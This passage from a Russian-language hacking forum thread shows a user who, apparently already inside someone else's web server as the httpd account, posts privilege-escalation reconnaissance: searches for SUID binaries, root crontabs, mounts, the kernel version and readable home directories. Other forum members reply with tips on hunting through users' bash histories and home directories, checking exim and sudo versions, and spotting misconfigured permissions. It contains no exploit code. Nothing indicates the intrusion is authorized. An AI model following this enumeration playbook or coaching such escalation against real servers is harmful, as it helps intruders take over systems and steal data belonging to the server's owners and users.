-rw-r--r--   1 root root  249836 2008-12-14 21:27:29.000000000 +0100 libncursesw.so.5.7
-rw-r--r--   1 root root   79608 2011-01-08 07:59:32.000000000 +0100 libnsl-2.7.so
lrwxrwxrwx   1 root root      13 2011-01-24 11:26:00.623163088 +0100 libnsl.so.1 -> libnsl-2.7.so
-rw-r--r--   1 root root   30436 2011-01-08 07:59:32.000000000 +0100 libnss_compat-2.7.so
lrwxrwxrwx   1 root root      20 2011-01-24 11:26:00.623163088 +0100 libnss_compat.so.2 -> libnss_compat-2.7.so
-rw-r--r--   1 root root   17880 2011-01-08 07:59:33.000000000 +0100 libnss_dns-2.7.so
lrwxrwxrwx   1 root root      17 2011-01-24 11:26:00.623163088 +0100 libnss_dns.so.2 -> libnss_dns-2.7.so
-rw-r--r--   1 root root   38408 2011-01-08 07:59:32.000000000 +0100 libnss_files-2.7.so
lrwxrwxrwx   1 root root      19 2011-01-24 11:26:00.623163088 +0100 libnss_files.so.2 -> libnss_files-2.7.so
-rw-r--r--   1 root root   17896 2011-01-08 07:59:32.000000000 +0100 libnss_hesiod-2.7.so
lrwxrwxrwx   1 root root      20 2011-01-24 11:26:00.623163088 +0100 libnss_hesiod.so.2 -> libnss_hesiod-2.7.so
-rw-r--r--   1 root root   34348 2011-01-08 07:59:33.000000000 +0100 libnss_nis-2.7.so
lrwxrwxrwx   1 root root      17 2011-01-24 11:26:00.623163088 +0100 libnss_nis.so.2 -> libnss_nis-2.7.so
-rw-r--r--   1 root root   46600 2011-01-08 07:59:32.000000000 +0100 libnss_nisplus-2.7.so
lrwxrwxrwx   1 root root      21 2011-01-24 11:26:00.623163088 +0100 libnss_nisplus.so.2 -> libnss_nisplus-2.7.so
lrwxrwxrwx   1 root root      17 2010-03-25 09:02:51.825455622 +0100 libpam.so.0 -> libpam.so.0.81.12
-rw-r--r--   1 root root   40440 2009-03-18 01:03:06.000000000 +0100 libpam.so.0.81.12
lrwxrwxrwx   1 root root      21 2010-03-25 09:02:52.078244589 +0100 libpam_misc.so.0 -> libpam_misc.so.0.81.3
-rw-r--r--   1 root root    8256 2009-03-18 01:03:06.000000000 +0100 libpam_misc.so.0.81.3
lrwxrwxrwx   1 root root      17 2010-03-25 09:02:52.088359611 +0100 libpamc.so.0 -> libpamc.so.0.81.0
-rw-r--r--   1 root root    9144 2009-03-18 01:03:06.000000000 +0100 libpamc.so.0.81.0
lrwxrwxrwx   1 root root      23 2010-03-25 09:02:51.825455622 +0100 libparted-1.6.so.12 -> libparted-1.6.so.12.0.9
-rw-r--r--   1 root root  379784 2005-01-31 13:36:29.000000000 +0100 libparted-1.6.so.12.0.9
lrwxrwxrwx   1 root root      22 2010-03-25 09:02:51.896231581 +0100 libparted-1.7.so.1 -> libparted-1.7.so.1.0.0
-rw-r--r--   1 root root  393168 2007-03-06 10:11:24.000000000 +0100 libparted-1.7.so.1.0.0
lrwxrwxrwx   1 root root      23 2010-03-25 09:02:51.855758859 +0100 libparted-1.8.so.10 -> libparted-1.8.so.10.0.0
-rw-r--r--   1 root root  397480 2008-11-24 02:50:10.000000000 +0100 libparted-1.8.so.10.0.0
-rw-r--r--   1 root root    5440 2011-01-08 07:59:32.000000000 +0100 libpcprofile.so
lrwxrwxrwx   1 root root      16 2010-03-25 09:02:52.078244589 +0100 libpopt.so.0 -> libpopt.so.0.0.0
-rw-r--r--   1 root root   33284 2008-06-25 08:27:20.000000000 +0200 libpopt.so.0.0.0
-rw-r--r--   1 root root   56180 2009-01-11 22:49:28.000000000 +0100 libproc-3.2.7.so
-rwxr-xr-x   1 root root  112012 2011-01-08 07:59:36.000000000 +0100 libpthread-2.7.so
lrwxrwxrwx   1 root root      17 2011-01-24 11:26:00.623163088 +0100 libpthread.so.0 -> libpthread-2.7.so
lrwxrwxrwx   1 root root      18 2010-03-25 09:02:51.825455622 +0100 libreadline.so.4 -> libreadline.so.4.3
-rw-r--r--   1 root root  172592 2004-06-13 21:02:12.000000000 +0200 libreadline.so.4.3
lrwxrwxrwx   1 root root      18 2010-03-25 09:02:52.088359611 +0100 libreadline.so.5 -> libreadline.so.5.2
-rw-r--r--   1 root root  200548 2009-01-20 16:07:11.000000000 +0100 libreadline.so.5.2
-rw-r--r--   1 root root   63312 2011-01-08 07:59:32.000000000 +0100 libresolv-2.7.so
lrwxrwxrwx   1 root root      16 2011-01-24 11:26:00.623163088 +0100 libresolv.so.2 -> libresolv-2.7.so
-rw-r--r--   1 root root   30624 2011-01-08 07:59:32.000000000 +0100 librt-2.7.so
lrwxrwxrwx   1 root root      12 2011-01-24 11:26:00.623163088 +0100 librt.so.1 -> librt-2.7.so
-rw-r--r--   1 root root   95964 2008-09-16 09:38:17.000000000 +0200 libselinux.so.1
-rw-r--r--   1 root root  215260 2008-07-12 16:51:50.000000000 +0200 libsepol.so.1
lrwxrwxrwx   1 root root      17 2010-03-25 09:02:51.825455622 +0100 libslang.so.1 -> libslang.so.1.4.9
lrwxrwxrwx   1 root root      22 2010-03-25 09:02:51.825455622 +0100 libslang.so.1-UTF8 -> libslang.so.1-UTF8.4.9
-rw-r--r--   1 root root  374952 2004-09-21 21:57:44.000000000 +0200 libslang.so.1-UTF8.4.9
-rw-r--r--   1 root root  374920 2004-09-21 21:57:44.000000000 +0200 libslang.so.1.4.9
lrwxrwxrwx   1 root root      17 2010-03-25 09:02:52.047866916 +0100 libslang.so.2 -> libslang.so.2.1.3
-rw-r--r--   1 root root  683040 2008-03-17 19:50:56.000000000 +0100 libslang.so.2.1.3
lrwxrwxrwx   1 root root      12 2010-03-25 09:02:51.825455622 +0100 libss.so.2 -> libss.so.2.0
-rw-r--r--   1 root root   18636 2008-10-13 05:33:34.000000000 +0200 libss.so.2.0
lrwxrwxrwx   1 root root      17 2010-03-25 09:02:51.825455622 +0100 libsysfs.so.1 -> libsysfs.so.1.0.2
-rw-r--r--   1 root root   44792 2005-02-09 20:08:03.000000000 +0100 libsysfs.so.1.0.2
lrwxrwxrwx   1 root root      17 2010-03-25 08:09:18.099629123 +0100 libsysfs.so.2 -> libsysfs.so.2.0.1
-rw-r--r--   1 root root   38584 2008-09-06 10:40:51.000000000 +0200 libsysfs.so.2.0.1
-rw-r--r--   1 root root   26284 2011-01-08 07:59:32.000000000 +0100 libthread_db-1.0.so
lrwxrwxrwx   1 root root      19 2011-01-24 11:26:00.623163088 +0100 libthread_db.so.1 -> libthread_db-1.0.so
lrwxrwxrwx   1 root root      13 2010-03-25 09:02:52.199757884 +0100 libtic.so.5 -> libtic.so.5.7
-rw-r--r--   1 root root   71736 2008-12-14 21:27:28.000000000 +0100 libtic.so.5.7
lrwxrwxrwx   1 root root      14 2010-03-25 09:02:52.260402871 +0100 libticw.so.5 -> libticw.so.5.7
-rw-r--r--   1 root root   71736 2008-12-14 21:27:29.000000000 +0100 libticw.so.5.7
lrwxrwxrwx   1 root root      19 2010-03-25 09:02:52.098494774 +0100 libusb-0.1.so.4 -> libusb-0.1.so.4.4.4
-rw-r--r--   1 root root   29264 2008-09-05 13:21:18.000000000 +0200 libusb-0.1.so.4.4.4
-rw-r--r--   1 root root    9684 2011-01-08 07:59:32.000000000 +0100 libutil-2.7.so
lrwxrwxrwx   1 root root      14 2011-01-24 11:26:00.623163088 +0100 libutil.so.1 -> libutil-2.7.so
lrwxrwxrwx   1 root root      14 2010-03-25 09:02:51.855758859 +0100 libuuid.so.1 -> libuuid.so.1.2
-rw-r--r--   1 root root   12912 2008-10-13 05:33:34.000000000 +0200 libuuid.so.1.2
lrwxrwxrwx   1 root root      22 2010-03-25 08:08:44.512788360 +0100 libvolume_id.so.0 -> libvolume_id.so.0.85.0
-rw-r--r--   1 root root   28156 2009-08-25 22:10:55.000000000 +0200 libvolume_id.so.0.85.0
lrwxrwxrwx   1 root root      16 2010-03-25 09:02:51.956967921 +0100 libwrap.so.0 -> libwrap.so.0.7.6
-rw-r--r--   1 root root   31168 2008-07-26 01:45:03.000000000 +0200 libwrap.so.0.7.6
lrwxrwxrwx   1 root root      19 2010-03-25 09:02:52.270530154 +0100 libxtables.so.0 -> libxtables.so.0.0.0
-rw-r--r--   1 root root   18380 2009-02-09 20:52:34.000000000 +0100 libxtables.so.0.0.0
drwxr-xr-x   2 root root      27 2009-05-07 16:38:26.000000000 +0200 lsb
drwxr-xr-x  12 root root    4096 2011-09-01 15:38:35.549994998 +0200 modules
drwxr-xr-x   2 root root    4096 2009-05-07 16:38:00.000000000 +0200 security
drwxr-xr-x  15 root root     110 2007-05-24 18:06:54.000000000 +0200 terminfo
drwxr-xr-x   3 root root    4096 2010-03-25 09:03:59.369751402 +0100 udev
drwxr-xr-x   2 root root    4096 2009-05-07 16:41:04.000000000 +0200 xtables
12. find /usr/bin -type f -perm -u+s -exec ls -la {} \;

Код:
-rwsr-sr-x 1 daemon daemon 39864 Oct 20  2008 /usr/bin/at
-rwsr-xr-x 1 root root 95496 Jun  9  2003 /usr/bin/cardinfo
-rwsr-xr-x 1 root root 22788 Nov 14  2009 /usr/bin/newgrp
-rwsr-xr-x 1 root root 32184 Nov 14  2009 /usr/bin/chfn
-rwsr-xr-x 1 root root 27736 Nov 14  2009 /usr/bin/chsh
-rwsr-xr-x 1 root root 41528 Nov 14  2009 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 31704 Nov 14  2009 /usr/bin/passwd
13. find /usr/sbin -type f -perm -u+s -exec ls -la {} \;

Код:
-rwsr-xr-- 1 root dip 230604 Dec 10  2001 /usr/sbin/pppd
14. find /bin -type f -perm -u+s -exec ls -la {} \;

Код:
-rwsr-xr-x 1 root root 64112 Apr 29  2008 /bin/mount
-rwsr-xr-x 1 root root 44088 Apr 29  2008 /bin/umount
-rwsr-xr-x 1 root root 30788 Jul 27  2010 /bin/ping
-rwsr-xr-x 1 root root 26616 Jul 27  2010 /bin/ping6
-rwsr-xr-x 1 root root 27108 Nov 14  2009 /bin/su
15. find /sbin -type f -perm -u+s -exec ls -la {} \;

Код:
-rwsr-xr-x 1 root root 13864 Jun  9  2003 /sbin/cardctl
-rwsr-xr-x 1 root root 68072 Apr 18  2010 /sbin/mount.nfs
16. find /usr/local/bin/ -type f -perm -u+s -exec ls -la {} \;

Код:

17. find /usr/local/sbin/ -type f -perm -u+s -exec ls -la {} \;

Код:
-rwsr-xr-x 1 root root 13353 Feb  7  2012 /usr/local/sbin/reload_apache
18. find /usr/local/libexec/ -type f -perm -u+s -exec ls -la {} \;

Код:
find: `/usr/local/libexec/': No such file or directory
19. php -v

Код:
/bin/sh: php: command not found
20. perl -v

Код:
This is perl, v5.10.0 built for i486-linux-gnu-thread-multi

Copyright 1987-2007, Larry Wall

Perl may be copied only under the terms of either the Artistic License or the
GNU General Public License, which may be found in the Perl 5 source kit.

Complete documentation for Perl, including FAQ lists, should be found on
this system using "man perl" or "perldoc perl".  If you have access to the
Internet, point your browser at http://www.perl.org/, the Perl Home Page.
21. python -V

Код:
Python 2.5.2




Код:
uid=80(httpd) gid=80(httpd) groups=42(shadow),80(httpd),108(clamav)
[+] /etc/crontab R permission
Код:
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/5 * * * * root /usr/local/bin/mykillqueries
*/5 * * * * root (test -S /var/run/nscd/socket && pidof nscd &> /dev/null) || (rm /var/cache/nscd/* && invoke-rc.d nscd restart &> /dev/null)
*/15 * * * * root /usr/local/bin/purgephpsessions
*/5 * * * * root /home/daemon/bin/checkdaemon.sh
00 01,05,09,13,17,21 * * * root /usr/local/bin/mysqlbatch
* * * * * root /root/admin/selfcheck > /dev/null 2>&1
*/3 * * * * root run-parts /opt/nagios/libexec/passive > /dev/null 2>&1
[i] mount:
Код:
/dev/sda2 on / type xfs (rw)
tmpfs on /lib/init/rw type tmpfs (rw,nosuid,mode=0755)
proc on /proc type proc (rw,noexec,nosuid,nodev)
sysfs on /sys type sysfs (rw,noexec,nosuid,nodev)
procbususb on /proc/bus/usb type usbfs (rw)
udev on /dev type tmpfs (rw,mode=0755)
tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)
devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=620)
/dev/sda1 on /dell type vfat (ro)
/dev/sda5 on /var type xfs (rw,nosuid)
/dev/sda6 on /tmp type xfs (rw,nosuid)
/dev/sda7 on /home type xfs (rw,noatime,usrquota,grpquota)
/home/mysql on /opt/mysql/data type none (rw,bind)
/home/log/mysql on /opt/mysql/log type none (rw,bind)
[i] df -h:
Код:
Filesystem            Size  Used Avail Use% Mounted on
/dev/sda2             3.9G  1.4G  2.6G  36% /
tmpfs                 8.0G     0  8.0G   0% /lib/init/rw
udev                   10M  2.8M  7.3M  28% /dev
tmpfs                 8.0G     0  8.0G   0% /dev/shm
/dev/sda1              40M  4.9M   35M  13% /dell
/dev/sda5             2.0G  1.1G  918M  54% /var
/dev/sda6             2.0G  4.8M  2.0G   1% /tmp
/dev/sda7             672G  296G  376G  45% /home
[i] uname -a:
Код:
Linux 2.6.27.52-imu-x86 #1 SMP Mon Aug 23 11:13:12 CEST 2010 i686 GNU/Linux
[i] cat /etc/issue:
Код:
Debian GNU/Linux 5.0 \n \l
[i] cat /proc/version:
Код:
Linux version 2.6.27.52-imu-x86 (root@test8-3) (gcc version 4.1.2 20061115 (prerelease) (Debian 4.1.1-21)) #1 SMP Mon Aug 23 11:13:12 CEST 2010
[i] GLIBC:
Код:
2011-01-08 /lib/libc-2.7.so
2011-01-08 /lib/libmemusage.so
[i] check all .bash_history
[i] HOME dir's check
Код:
/bin home dir read perm
/dev home dir read perm
/home/admin home dir read perm
<...каталоги пользователей...>
/opt/apache home dir read perm
/opt/mysql home dir read perm
/opt/nagios home dir read perm
/root home dir read perm
/usr/games home dir read perm
/usr/sbin home dir read perm
/var home dir read perm
/var/backups home dir read perm
/var/cache/man home dir read perm
/var/lib/clamav home dir read perm
/var/lib/libuuid home dir read perm
/var/lib/nfs home dir read perm
/var/lib/snmp home dir read perm
/var/mail home dir read perm
/var/run/quagga/ home dir read perm
/var/run/sshd home dir read perm
[i] SUID bit files:
Код:
/usr/sbin/pppd
/usr/local/sbin/reload_apache
/usr/lib/openssh/ssh-keysign
/usr/lib/pt_chown
/usr/lib/eject/dmcrypt-get-device
/usr/bin/cardinfo
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/passwd
/sbin/cardctl
/sbin/mount.nfs
/opt/apache/bin/pwauth
/opt/cgiwrap/bin/cgiwrap
/opt/cgiwrap/bin/cgiwrapd
/opt/cgiwrap/bin/nph-cgiwrap
/bin/mount
/bin/umount
/bin/ping
/bin/ping6
/bin/su
[i] DONE

Самые интересные закрыты от чтения, остальное системные и статические скрипты.

httpd@www:/etc$ ls -lah cron.d
Код:
total 36K
drwxr-xr-x   2 root root  113 Apr 10 14:54 .
drwxr-xr-x+ 74 root root 8.0K Aug 12 20:26 ..
-rw-r--r--   1 root root  102 Jul 28  2004 .placeholder
-rw-r--r--   1 root root   37 Feb 17 10:24 cdpr-conf-cron
-rwx------   1 root root  166 Mar 28 15:21 clamupdate
-rw-r--r--   1 root root  115 Mar 25  2010 rsync_check
-rw-r--r--   1 root root  582 Feb 26  2007 sysstat
-rw-r--r--   1 root root   70 Apr 10 14:54 ulogd_check
httpd@www:/etc$ ls -lah cron.hourly
Код:
total 24K
drwxr-xr-x   2 root root   65 Jun 16  2011 .
drwxr-xr-x+ 74 root root 8.0K Aug 12 20:26 ..
-rw-r--r--   1 root root  102 Jul 28  2004 .placeholder
-rwxr-xr-x   1 root root  252 Sep 29  2011 ntpdate
-rwxr-xr-x   1 root root  311 Jun 16  2011 perc-raidcheck-mail
httpd@www:/etc$ ls -lah cron.daily
Код:
total 116K
drwxr-xr-x   2 root root 4.0K May  8 10:23 .
drwxr-xr-x+ 74 root root 8.0K Aug 12 20:26 ..
-rw-r--r--   1 root root  102 Jul 28  2004 .placeholder
-rwxr-xr-x   1 root root  379 Mar  8  2008 acct
-rwxr-xr-x   1 root root 7.4K Apr 20  2009 apt
-rwxr-xr-x   1 root root  314 Mar 14  2007 aptitude
-rwx------   1 root root 1.1K Jan 19  2012 backup-mysql
-rwxr-xr-x   1 root root  502 Jul  4  2002 bsdmainutils
-rw-r--r--   1 root root   12 Mar 25  2010 find
-rwxr-xr-x   1 root root    0 Dec 21  2007 find.dpkg-bak
lrwxrwxrwx   1 root root   25 Mar 25  2010 findlamers -> /usr/local/bin/findlamers
-rwx------   1 root root   52 Mar 25  2010 fixinstallerquota-cron
-rwxr-xr-x   1 root root 4.8K Jul  4  2011 fixperms
-rwxr-xr-x   1 root root 2.1K Mar 25  2010 ioerrorcheck
-rwx------   1 root root  141 Mar 25  2010 log-daemon
-rwxr-xr-x   1 root root   89 May 25  2005 logrotate
-rwxr-xr-x   1 root root  954 Jan 24  2009 man-db
-rwxr-xr-x   1 root root   86 Sep 27  2001 modutils
-rwxr-xr-x   1 root root 1.1K Mar 26  2002 ntp-simple
-rwxr-xr-x   1 root root  739 Feb  7  2012 purgelogs
-rwxr-xr-x   1 root root  451 Jan 25  2011 purgelogsconso
-rwxr-xr-x   1 root root  330 Feb  7  2012 purgetmp
-rwxr-xr-x   1 root root  345 Mar  7  2002 quota
-rwx------   1 root root  185 Mar 25  2010 saves
-rwxr-xr-x   1 root root 3.3K Sep 28  2008 standard
-rwxr-xr-x   1 root root 1.2K Jun 20  2008 sysklogd
-rwxr-xr-x   1 root root  469 Feb 26  2007 sysstat
httpd@www:/etc$ ls -lah cron.monthly
Код:
total 24K
drwxr-xr-x   2 root root   72 Mar 25  2010 .
drwxr-xr-x+ 74 root root 8.0K Aug 12 20:26 ..
-rw-r--r--   1 root root  102 Jul 28  2004 .placeholder
-rwxr-xr-x   1 root root 1.3K Mar  8  2008 acct
lrwxrwxrwx   1 root root   29 Mar 25  2010 findwarezbatch -> /usr/local/bin/findwarezbatch
-rwxr-xr-x   1 root root  129 Oct  1  2001 standard
httpd@www:/etc$ ls -lah cron.weekly
Код:
total 28K
drwxr-xr-x   2 root root   70 Jan 24  2011 .
drwxr-xr-x+ 74 root root 8.0K Aug 12 20:26 ..
-rw-r--r--   1 root root  102 Jul 28  2004 .placeholder
-rwxr-xr-x   1 root root  528 Jan 24  2009 man-db
-rwxr-xr-x   1 root root  643 Mar 26  2002 ntp-simple
-rwxr-xr-x   1 root root 1.2K Jun 20  2008 sysklogd

/usr/local/bin сейчас перекопаю.

Последний раз редактировалось Untitled; 12.08.2012 в 21:49..
Untitled вне форума   Ответить с цитированием
Старый 12.08.2012, 20:53   #499
b3
 
Аватар для b3
 
Регистрация: 18.08.2010
Сообщений: 352
Репутация: 105
По умолчанию

чекни exim версию, судо версию, кронтабы, список запущенных процессов, /root на вкусности, башхистори каждого юзвера, хомы каждого юзвера на вкусности, версию фтп сервера и кривые права на конфигурационных файлах в том же /etc/ и /usr/
Есть скрипты для автоматизации сих процессов в графе Автоматизация сбора информации на сервере. тема: https://rdot.org/forum/showthread.php?t=1860
b3 вне форума   Ответить с цитированием
Старый 13.08.2012, 03:48   #500
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

Цитата:
/usr/bin/cardinfo
есть официально, что делает - надо изучать

Цитата:
*/15 * * * * root /usr/local/bin/purgephpsessions
*/5 * * * * root /home/daemon/bin/checkdaemon.sh
00 01,05,09,13,17,21 * * * root /usr/local/bin/mysqlbatch
и всё, больше не видно пока ничего
Pashkela вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot